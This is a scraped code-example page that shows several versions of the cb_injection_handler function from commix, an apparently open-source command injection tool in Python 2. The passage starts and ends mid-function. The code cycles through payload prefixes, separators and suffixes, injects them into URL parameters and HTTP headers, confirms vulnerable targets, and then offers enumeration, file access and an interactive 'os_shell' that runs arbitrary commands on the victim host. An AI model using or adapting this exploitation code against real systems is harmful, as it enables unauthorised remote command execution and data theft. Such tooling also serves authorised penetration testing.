                        html_parser = HTMLParser.HTMLParser()
                        shell = html_parser.unescape(shell)
                        if shell != "":
                          print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                        else:
                          if menu.options.verbose:
                            print ""
                          print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"

                  except KeyboardInterrupt: 
                    raise
                    
                  except SystemExit: 
                    raise

              elif gotshell in settings.CHOISE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False 
                  else:
                    return True  

              elif gotshell in settings.CHOISE_QUIT:
                sys.exit(0)

              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                pass
                
  if no_result == True:
    print ""
    return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Ejemplo n.º 4
0
def cb_injection_handler(url, delay, filename, http_request_method):

    counter = 1
    vp_flag = True
    no_result = True
    is_encoded = False
    export_injection_info = False

    injection_type = "Results-based Command Injection"
    technique = "classic injection technique"

    sys.stdout.write("(*) Testing the " + technique + "... ")
    sys.stdout.flush()

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    for whitespace in settings.WHITESPACES:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:
                    i = i + 1

                    # Check for bad combination of prefix and separator
                    combination = prefix + separator
                    if combination in settings.JUNK_COMBINATION:
                        prefix = ""

                    # Change TAG on every request to prevent false-positive results.
                    TAG = ''.join(
                        random.choice(string.ascii_uppercase)
                        for i in range(6))

                    randv1 = random.randrange(100)
                    randv2 = random.randrange(100)
                    randvcalc = randv1 + randv2

                    # Define alter shell
                    alter_shell = menu.options.alter_shell

                    try:
                        if alter_shell:
                            # Classic -alter shell- decision payload (check if host is vulnerable).
                            payload = cb_payloads.decision_alter_shell(
                                separator, TAG, randv1, randv2)
                        else:
                            # Classic decision payload (check if host is vulnerable).
                            payload = cb_payloads.decision(
                                separator, TAG, randv1, randv2)

                        # Define prefixes & suffixes
                        payload = parameters.prefixes(payload, prefix)
                        payload = parameters.suffixes(payload, suffix)

                        if menu.options.base64:
                            payload = urllib.unquote(payload)
                            payload = base64.b64encode(payload)
                        else:
                            if separator == " ":
                                payload = re.sub(" ", "%20", payload)
                            else:
                                payload = re.sub(" ", whitespace, payload)

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            sys.stdout.write("\n" + Fore.GREY +
                                             "(~) Payload: " + payload +
                                             Style.RESET_ALL)

                        # if need page reload
                        if menu.options.url_reload:
                            time.sleep(delay)
                            response = urllib.urlopen(url)

                        # Cookie Injection
                        if settings.COOKIE_INJECTION == True:
                            # Check if target host is vulnerable to cookie injection.
                            vuln_parameter = parameters.specify_cookie_parameter(
                                menu.options.cookie)
                            response = cb_injector.cookie_injection_test(
                                url, vuln_parameter, payload)

                        # User-Agent Injection
                        elif settings.USER_AGENT_INJECTION == True:
                            # Check if target host is vulnerable to user-agent injection.
                            vuln_parameter = parameters.specify_user_agent_parameter(
                                menu.options.agent)
                            response = cb_injector.user_agent_injection_test(
                                url, vuln_parameter, payload)

                        # Referer Injection
                        elif settings.REFERER_INJECTION == True:
                            # Check if target host is vulnerable to referer injection.
                            vuln_parameter = parameters.specify_referer_parameter(
                                menu.options.referer)
                            response = cb_injector.referer_injection_test(
                                url, vuln_parameter, payload)

                        else:
                            # Check if target host is vulnerable.
                            response, vuln_parameter = cb_injector.injection_test(
                                payload, http_request_method, url)

                        # Evaluate test results.
                        shell = cb_injector.injection_test_results(
                            response, TAG, randvcalc)

                        if not menu.options.verbose:
                            percent = ((i * 100) / total)
                            float_percent = "{0:.1f}".format(
                                round(((i * 100) / (total * 1.0)), 2))

                            if percent == 100:
                                if no_result == True:
                                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                else:
                                    percent = str(float_percent) + "%"
                            elif len(shell) != 0:
                                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                            else:
                                percent = str(float_percent) + "%"
                            sys.stdout.write("\r(*) Testing the " + technique +
                                             "... " + "[ " + percent + " ]")
                            sys.stdout.flush()

                    except KeyboardInterrupt:
                        raise

                    except:
                        continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False

                        if settings.COOKIE_INJECTION == True:
                            header_name = " Cookie"
                            found_vuln_parameter = vuln_parameter
                            the_type = " HTTP header"

                        elif settings.USER_AGENT_INJECTION == True:
                            header_name = " User-Agent"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.REFERER_INJECTION == True:
                            header_name = " Referer"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        else:
                            header_name = ""
                            the_type = " parameter"
                            if http_request_method == "GET":
                                found_vuln_parameter = parameters.vuln_GET_param(
                                    url)
                            else:
                                found_vuln_parameter = vuln_parameter

                        if len(found_vuln_parameter) != 0:
                            found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"

                        # Print the findings to log file.
                        if export_injection_info == False:
                            export_injection_info = logs.add_type_and_technique(
                                export_injection_info, filename,
                                injection_type, technique)
                        if vp_flag == True:
                            vp_flag = logs.add_parameter(
                                vp_flag, filename, http_request_method,
                                vuln_parameter, payload)
                        logs.update_payload(filename, counter, payload)
                        counter = counter + 1

                        # Print the findings to terminal.
                        print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL
                        print "  (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
                        print "  (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
                        ) + Style.RESET_ALL + ""
                        print "  (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
                            "%20", " ", payload) + Style.RESET_ALL

                        # Check for any enumeration options.
                        if settings.ENUMERATION_DONE == True:
                            while True:
                                enumerate_again = raw_input(
                                    "\n(?) Do you want to enumerate again? [Y/n/q] > "
                                ).lower()
                                if enumerate_again in settings.CHOISE_YES:
                                    cb_enumeration.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename)
                                    break
                                elif enumerate_again in settings.CHOISE_NO:
                                    break
                                elif enumerate_again in settings.CHOISE_QUIT:
                                    sys.exit(0)
                                else:
                                    if enumerate_again == "":
                                        enumerate_again = "enter"
                                    print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                                    pass
                        else:
                            cb_enumeration.do_check(separator, TAG, prefix,
                                                    suffix, whitespace,
                                                    http_request_method, url,
                                                    vuln_parameter,
                                                    alter_shell, filename)

                        # Check for any system file access options.
                        if settings.FILE_ACCESS_DONE == True:
                            while True:
                                file_access_again = raw_input(
                                    "(?) Do you want to access files again? [Y/n/q] > "
                                ).lower()
                                if file_access_again in settings.CHOISE_YES:
                                    print ""
                                    cb_file_access.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename)
                                    break
                                elif file_access_again in settings.CHOISE_NO:
                                    break
                                elif file_access_again in settings.CHOISE_QUIT:
                                    sys.exit(0)
                                else:
                                    if file_access_again == "":
                                        file_access_again = "enter"
                                    print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
                                    pass
                        else:
                            cb_file_access.do_check(separator, TAG, prefix,
                                                    suffix, whitespace,
                                                    http_request_method, url,
                                                    vuln_parameter,
                                                    alter_shell, filename)

                        # Check if defined single cmd.
                        if menu.options.os_cmd:
                            cb_enumeration.single_os_cmd_exec(
                                separator, TAG, prefix, suffix, whitespace,
                                http_request_method, url, vuln_parameter,
                                alter_shell, filename)

                        # Pseudo-Terminal shell
                        go_back = False
                        while True:
                            if go_back == True:
                                break
                            gotshell = raw_input(
                                "(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > "
                            ).lower()
                            if gotshell in settings.CHOISE_YES:
                                print ""
                                print "Pseudo-Terminal (type '?' for shell options)"
                                while True:
                                    try:
                                        cmd = raw_input("Shell > ")
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            if cmd.lower() == "?":
                                                menu.shell_options()
                                            elif cmd.lower() == "quit":
                                                sys.exit(0)
                                            elif cmd.lower() == "back":
                                                go_back = True
                                                if checks.check_next_attack_vector(
                                                        technique,
                                                        go_back) == True:
                                                    break
                                                else:
                                                    if no_result == True:
                                                        return False
                                                    else:
                                                        return True
                                            else:
                                                pass

                                        else:
                                            # Command execution results.
                                            response = cb_injector.injection(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell,
                                                filename)

                                            # if need page reload
                                            if menu.options.url_reload:
                                                time.sleep(delay)
                                                response = urllib.urlopen(url)

                                            # Evaluate injection results.
                                            shell = cb_injector.injection_results(
                                                response, TAG)
                                            if shell:
                                                shell = "".join(
                                                    str(p) for p in shell)
                                                html_parser = HTMLParser.HTMLParser(
                                                )
                                                shell = html_parser.unescape(
                                                    shell)
                                                if shell != "":
                                                    print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                                                else:
                                                    print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"

                                    except KeyboardInterrupt:
                                        raise

                            elif gotshell in settings.CHOISE_NO:
                                if checks.check_next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOISE_QUIT:
                                sys.exit(0)

                            else:
                                if gotshell == "":
                                    gotshell = "enter"
                                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                                pass

    if no_result == True:
        print ""
        return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Ejemplo n.º 5
0
def cb_injection_handler(url, timesec, filename, http_request_method):
  shell = False
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded = False
  export_injection_info = False
  injection_type = "results-based OS command injection"
  technique = "classic command injection technique"

  if not settings.LOAD_SESSION: 
    info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
      
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          if whitespace == " ":
            whitespace = urllib.quote(whitespace) 
          # Check injection state
          settings.DETECTION_PHASE = True
          settings.EXPLOITATION_PHASE = False
          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
            try:
              settings.CLASSIC_STATE = True
              url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
              checks.check_for_stored_tamper(payload)
            except TypeError:
              err_msg = "An error occurred while accessing session file ('"
              err_msg += settings.SESSION_FILE + "'). "
              err_msg += "Use the '--flush-session' option."
              print settings.print_critical_msg(err_msg)
              raise SystemExit()

          else:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
            
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2
            
            # Define alter shell
            alter_shell = menu.options.alter_shell
            
            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = cb_payloads.decision(separator, TAG, randv1, randv2)
              
              # Define prefixes & suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)
              
              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                print settings.print_payload(payload)
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 
                
              # Cookie header injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent HTTP header injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent HTTP header injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer HTTP header injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer HTTP header injection.
                vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
                response = cb_injector.referer_injection_test(url, vuln_parameter, payload)

              # Host HTTP header injection
              elif settings.HOST_INJECTION == True:
                # Check if target host is vulnerable to host HTTP header injection.
                vuln_parameter = parameters.specify_host_parameter(menu.options.host)
                response = cb_injector.host_injection_test(url, vuln_parameter, payload)

              # Custom HTTP header Injection
              elif settings.CUSTOM_HEADER_INJECTION == True:
                # Check if target host is vulnerable to custom http header injection.
                vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG)
                response = cb_injector.custom_header_injection_test(url, vuln_parameter, payload)

              else:
                # Check if target host is vulnerable.
                response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)

              # Try target page reload (if it is required).
              if settings.URL_RELOAD:
                response = requests.url_reload(url, timesec)

              # Evaluate test results.
              time.sleep(timesec)
              shell = cb_injector.injection_test_results(response, TAG, randvcalc)

              if not settings.VERBOSITY_LEVEL >= 1:
                percent = ((i*100)/total)
                float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
              
                if shell == False:
                  info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " +  "[ " + float_percent + "%" + " ]"
                  sys.stdout.write("\r" + settings.print_info_msg(info_msg))  
                  sys.stdout.flush()

                if float(float_percent) >= 99.9:
                  if no_result == True:
                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  else:
                    percent = str(float_percent)+ "%"
                elif len(shell) != 0:
                  percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                else:
                  percent = str(float_percent)+ "%"
                info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " +  "[ " + percent + " ]"
                sys.stdout.write("\r" + settings.print_info_msg(info_msg))  
                sys.stdout.flush()
            
            except KeyboardInterrupt: 
              raise

            except SystemExit: 
              raise

            except EOFError:
              err_msg = "Exiting, due to EOFError."
              print settings.print_error_msg(err_msg)
              raise 

            except:
              continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False
            # Check injection state
            settings.DETECTION_PHASE = False
            settings.EXPLOITATION_PHASE = True
            if settings.COOKIE_INJECTION == True: 
              header_name = " cookie"
              found_vuln_parameter = vuln_parameter
              the_type = " parameter"

            elif settings.USER_AGENT_INJECTION == True: 
              header_name = " User-Agent"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.REFERER_INJECTION == True: 
              header_name = " Referer"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.HOST_INJECTION == True: 
              header_name = " Host"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.CUSTOM_HEADER_INJECTION == True: 
              header_name = " " + settings.CUSTOM_HEADER_NAME
              found_vuln_parameter = ""
              the_type = " HTTP header"

            else:    
              header_name = ""
              the_type = " parameter"
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            if len(found_vuln_parameter) != 0 :
              found_vuln_parameter = " '" +  found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload)
            logs.update_payload(filename, counter, payload) 
            counter = counter + 1

            if not settings.LOAD_SESSION:
              if not settings.VERBOSITY_LEVEL >= 1:
                print ""
              else:
                checks.total_of_requests()

            # Print the findings to terminal.
            success_msg = "The"
            if len(found_vuln_parameter) > 0 and not "cookie" in header_name : 
              success_msg += " " + http_request_method + "" 
            success_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name
            success_msg += found_vuln_parameter + " seems injectable via "
            success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "."
            print settings.print_success_msg(success_msg)
            print settings.SUB_CONTENT_SIGN + "Payload: " + str(checks.url_decode(payload)) + Style.RESET_ALL
            # Export session
            if not settings.LOAD_SESSION:
              session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level)
            else:
              whitespace = settings.WHITESPACE[0]
              settings.LOAD_SESSION = False  
            
            # Check for any enumeration options.
            new_line = True
            if settings.ENUMERATION_DONE == True :
              while True:
                if not menu.options.batch:
                  question_msg = "Do you want to enumerate again? [Y/n] > "
                  enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower()
                else:
                  enumerate_again = ""  
                if len(enumerate_again) == 0:
                  enumerate_again = "y"
                if enumerate_again in settings.CHOICE_YES:
                  cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec)
                  #print ""
                  break
                elif enumerate_again in settings.CHOICE_NO:
                  new_line = False
                  break
                elif enumerate_again in settings.CHOICE_QUIT:
                  raise SystemExit()
                else:
                  err_msg = "'" + enumerate_again + "' is not a valid answer."  
                  print settings.print_error_msg(err_msg)
                  pass
            else:
              if menu.enumeration_options():
                cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec)
          
            if not menu.file_access_options() and not menu.options.os_cmd and new_line:
              print ""
            
            # Check for any system file access options.
            if settings.FILE_ACCESS_DONE == True :
              if settings.ENUMERATION_DONE != True:
                print ""
              while True:
                if not menu.options.batch:
                  question_msg = "Do you want to access files again? [Y/n] > "
                  sys.stdout.write(settings.print_question_msg(question_msg))
                  file_access_again = sys.stdin.readline().replace("\n","").lower()
                else:
                  file_access_again = ""  
                if len(file_access_again) == 0:
                   file_access_again = "y"
                if file_access_again in settings.CHOICE_YES:
                  cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec)
                  print ""
                  break
                elif file_access_again in settings.CHOICE_NO: 
                  break
                elif file_access_again in settings.CHOICE_QUIT:
                  raise SystemExit()
                else:
                  err_msg = "'" + file_access_again  + "' is not a valid answer."  
                  print settings.print_error_msg(err_msg)
                  pass
            else:
              if menu.file_access_options():
                # if not menu.enumeration_options():
                #   print ""
                cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec)
                print ""
              
            # Check if defined single cmd.
            if menu.options.os_cmd:
              # if not menu.file_access_options():
              #   print ""
              cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec)

            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break 
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                sys.stdout.write(settings.print_question_msg(question_msg))
                gotshell = sys.stdin.readline().replace("\n","").lower()
              else:
                gotshell = ""  
              if len(gotshell) == 0:
                 gotshell = "y"
              if gotshell in settings.CHOICE_YES:
                if not menu.options.batch:
                  print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                if readline_error:
                  checks.no_readline_module()
                while True:
                  try:
                    if not readline_error:
                      # Tab compliter
                      readline.set_completer(menu.tab_completer)
                      # MacOSX tab compliter
                      if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
                        readline.parse_and_bind("bind ^I rl_complete")
                      # Unix tab compliter
                      else:
                        readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="")
                      if go_back and go_back_again == False:
                        break
                      if go_back and go_back_again:
                        return True 
                    else:
                      # Command execution results.
                      time.sleep(timesec)
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                      # Try target page reload (if it is required).
                      if settings.URL_RELOAD:
                        response = requests.url_reload(url, timesec)
                      if menu.options.ignore_session or \
                         session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                        # Evaluate injection results.
                        try:
                          shell = cb_injector.injection_results(response, TAG, cmd)
                          shell = "".join(str(p) for p in shell)
                        except:
                          print ""
                          continue  
                        if not menu.options.ignore_session :
                          session_handler.store_cmd(url, cmd, shell, vuln_parameter)
                      else:
                        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
                      if shell:
                        html_parser = HTMLParser.HTMLParser()
                        shell = html_parser.unescape(shell)
                        # Update logs with executed cmds and execution results.
                        logs.executed_command(filename, cmd, shell)
                      if shell != "":
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                      else:
                        if settings.VERBOSITY_LEVEL >= 1:
                          print ""
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print settings.print_critical_msg(err_msg) + "\n"

                  except KeyboardInterrupt: 
                    raise
                    
                  except SystemExit: 
                    raise

                  except EOFError:
                    err_msg = "Exiting, due to EOFError."
                    print settings.print_error_msg(err_msg)
                    raise 

              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False 
                  else:
                    return True  

              elif gotshell in settings.CHOICE_QUIT:
                raise SystemExit()

              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print settings.print_error_msg(err_msg)
                pass
                
  if no_result == True:
    if settings.VERBOSITY_LEVEL == 0:
      print ""
    return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Ejemplo n.º 6
0
def cb_injection_handler(url, delay, filename, http_request_method):
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded= False
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "classic injection technique"

  if not settings.LOAD_SESSION: 
    info_msg = "Testing the " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
    if settings.VERBOSITY_LEVEL >= 1:
      print ""
      
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          
          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique):
            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
            checks.check_for_stored_tamper(payload)
          
          else:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
            
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2
            
            # Define alter shell
            alter_shell = menu.options.alter_shell
            
            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = cb_payloads.decision(separator, TAG, randv1, randv2)
              
              # Define prefixes & suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)

              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                print settings.print_payload(payload)
                
              # if need page reload
              if menu.options.url_reload:
                time.sleep(delay)
                response = urllib.urlopen(url)

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
                
              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
                # Check if target host is vulnerable to referer injection.
                vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
                response = cb_injector.referer_injection_test(url, vuln_parameter, payload)

              # Custom HTTP header Injection
              elif settings.CUSTOM_HEADER_INJECTION == True:
                # Check if target host is vulnerable to custom http header injection.
                vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG)
                response = cb_injector.custom_header_injection_test(url, vuln_parameter, payload)

              else:
                # Check if target host is vulnerable.
                response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)

              # Evaluate test results.
              shell = cb_injector.injection_test_results(response, TAG, randvcalc)

              if not settings.VERBOSITY_LEVEL >= 1:
                percent = ((i*100)/total)
                float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
              
                if shell == False:
                  info_msg = "Testing the " + technique + "... " +  "[ " + float_percent + "%" + " ]"
                  sys.stdout.write("\r" + settings.print_info_msg(info_msg))  
                  sys.stdout.flush()

                if float(float_percent) >= 99.9:
                  if no_result == True:
                    percent = Fore.RED + "FAILED" + Style.RESET_ALL
                  else:
                    percent = str(float_percent)+ "%"
                elif len(shell) != 0:
                  percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                else:
                  percent = str(float_percent)+ "%"
                info_msg = "Testing the " + technique + "... " +  "[ " + percent + " ]"
                sys.stdout.write("\r" + settings.print_info_msg(info_msg))  
                sys.stdout.flush()
            
            except KeyboardInterrupt: 
              raise

            except SystemExit: 
              raise

            except:
              continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            if settings.COOKIE_INJECTION == True: 
              header_name = " cookie"
              found_vuln_parameter = vuln_parameter
              the_type = " parameter"

            elif settings.USER_AGENT_INJECTION == True: 
              header_name = " User-Agent"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.REFERER_INJECTION == True: 
              header_name = " Referer"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.CUSTOM_HEADER_INJECTION == True: 
              header_name = " " + settings.CUSTOM_HEADER_NAME
              found_vuln_parameter = ""
              the_type = " HTTP header"

            else:    
              header_name = ""
              the_type = " parameter"
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            if len(found_vuln_parameter) != 0 :
              found_vuln_parameter = " '" +  found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload)
            logs.update_payload(filename, counter, payload) 
            counter = counter + 1
            
            if not settings.VERBOSITY_LEVEL >= 1 and not settings.LOAD_SESSION:
              print ""

            # Print the findings to terminal.
            success_msg = "The"
            if found_vuln_parameter == " ": 
              success_msg += http_request_method + "" 
            success_msg += the_type + header_name
            success_msg += found_vuln_parameter + " seems injectable via "
            success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "."
            print settings.print_success_msg(success_msg)
            print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub("%20", " ", re.sub("%2B", "+",payload)) + Style.RESET_ALL
            # Export session
            if not settings.LOAD_SESSION:
              session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable=menu.options.level)
            else:
              whitespace = settings.WHITESPACE[0]
